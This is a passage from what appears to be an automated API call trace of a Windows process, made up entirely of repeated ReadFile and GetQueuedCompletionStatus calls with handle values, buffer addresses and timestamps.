lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.343] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.343] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.344] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.344] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.345] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.345] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.346] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.346] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.347] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.347] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.349] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.349] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.349] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.350] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.350] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50) returned 1 [0089.351] ReadFile (in: hFile=0x268, lpBuffer=0x2639754, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0 | out: lpBuffer=0x2639754, lpNumberOfBytesRead=0x0, lpOverlapped=0x26396f0) returned 1 [0089.351] GetQueuedCompletionStatus (in: CompletionPort=0x278, lpNumberOfBytesTransferred=0x552ff54, lpCompletionKey=0x552ff58, lpOverlapped=0x552ff50, 